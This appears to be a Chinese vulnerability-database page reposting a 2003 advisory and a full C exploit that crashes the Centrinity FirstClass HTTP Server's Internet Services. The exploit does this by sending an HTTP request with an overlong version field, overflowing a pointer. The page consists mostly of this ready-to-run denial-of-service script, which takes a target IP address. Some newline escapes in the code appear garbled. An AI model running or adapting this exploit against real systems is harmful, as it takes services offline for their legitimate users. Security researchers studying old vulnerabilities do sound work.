Centrinity FirstClass HTTP Server 5.50/5.77/7.0/7.1 – Long Version Field Denial of Service
| 漏洞ID | 1054222 | 漏洞类型 | |
| 发布时间 | 2003-10-08 | 更新时间 | 2003-10-08 |
CVE编号
|
N/A |
CNNVD-ID
|
N/A |
| 漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8793/info
A problem has been reported in the handling of overly long HTTP version string data by Centrinity FirstClass. Because of this, it may be possible for an attacker deny service to legitimate users of a vulnerable system. This may be due to an exploitable boundary condition error, though this is not confirmed.
/*******************************************
* FirstClass Internet Services Remote DoS *
*******************************************
discovered & coded by I2S-LAB
--------------------------------------------
This exploit uses a ptr overflow to remotely
shutdown the Internet Services of FirstClass.
CONTACT
_______
Fred CHAVEROT : fred[at]I2S-LAB.com
Aur=E9lien BOUDOUX : aurelien[at]I2S-LAB.com
URL : http://www.I2S-LaB.com
*******************************************/
#include <windows.h>
#include <winsock.h>
#pragma comment (lib,"wsock32.lib")
#define PerfectOverwrite 246
void main (int argc, char *argv[])
{
int len;
SOCKET sock1;
SOCKADDR_IN sin;
char *sav;
WSADATA wsadata;
WORD wVersionRequested = MAKEWORD (2,0);
printf ("- FirsClass Internet Services Remote DoS -nn"
"Discovered & coded by I2S-LABn"
"http://www.I2S-LaB.comnn");
if (!argv[1])
{
printf ("Usage : %s <IP Address>n", argv[0]);
ExitProcess (0);
}
if (WSAStartup(wVersionRequested, &wsadata) ) ExitProcess (0);
if (!(sav = (char *) LocalAlloc (LPTR, 20 + PerfectOverwrite)) )
{
printf ("Error ! cannot allocate enough memory.n");
ExitProcess (0);
};
lstrcat (sav, "GET / HTTP/1.1");
memset (&sav[14], 'A', PerfectOverwrite - 4);
lstrcat (sav,"DDDDrnrn");
sin.sin_family = AF_INET;
sin.sin_port = htons (80);
if ( (sin.sin_addr.s_addr=inet_addr (argv[1])) == INADDR_NONE)
{
printf ("Incorrect IP Address : %sn", argv[1]);
ExitProcess(0);
}
sock1 = socket (AF_INET, SOCK_STREAM, 0);
printf ("nconnecting to %s...", argv[1]);
if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) == SOCKET_ERROR )
printf ("connection failed!n");
else
{
printf ("ok!nSending crafted request...");
send (sock1,sav, PerfectOverwrite + 18,0);
puts ("ok!");
}
closesocket (sock1);
}
相关推荐: expect (/usr/bin/expect) – Local Buffer Overflow
expect (/usr/bin/expect) – Local Buffer Overflow 漏洞ID 1053496 漏洞类型 发布时间 2000-12-04 更新时间 2000-12-04 CVE编号 N/A CNNVD-ID N/A 漏洞平台 Lin…
正文完
发表至: 网络安全漏洞
2021年4月9日
CVE编号
CNNVD-ID